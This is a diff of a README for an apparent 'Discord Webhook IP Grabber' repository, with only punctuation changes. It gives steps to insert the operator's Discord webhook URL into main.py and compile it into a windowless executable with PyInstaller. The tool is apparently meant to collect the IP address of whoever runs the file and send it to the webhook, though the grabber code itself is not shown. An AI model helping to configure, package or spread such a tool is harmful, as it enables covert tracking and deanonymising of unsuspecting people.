allantong1234/Discord-Webhook-IP-Grabber/README.md

 2. Replace "webhook-url-here" with your webhooks url, make sure its discord.com instead of discordapp.com.
 3. (Optional) Compile the file into a exe, dont know how? https://www.youtube.com/watch?v=UZX5kH72Yx4.

- If you aren't able to watch the toturial do the following steps
+ If you aren't able to watch the toturial do the following steps:

    a.
-Open CMD,powerShell or Terminal
+Open CMD,powerShell or Terminal.

    b.
-Navigate to the "main.py" directory in consoles
+Navigate to the "main.py" directory in consoles.

    c.
-Type "pyinstaller --onefile -w main.py" and press Enter
+Type "pyinstaller --onefile -w main.py" and press Enter.

    d.
-After a while your program is compiled in "dist" folder
+After a while your program is compiled in "dist" folder.

 4. Done.

 ## How to convert to .EXE
 ![](https://i.imgur.com/6tx5tUK.gif)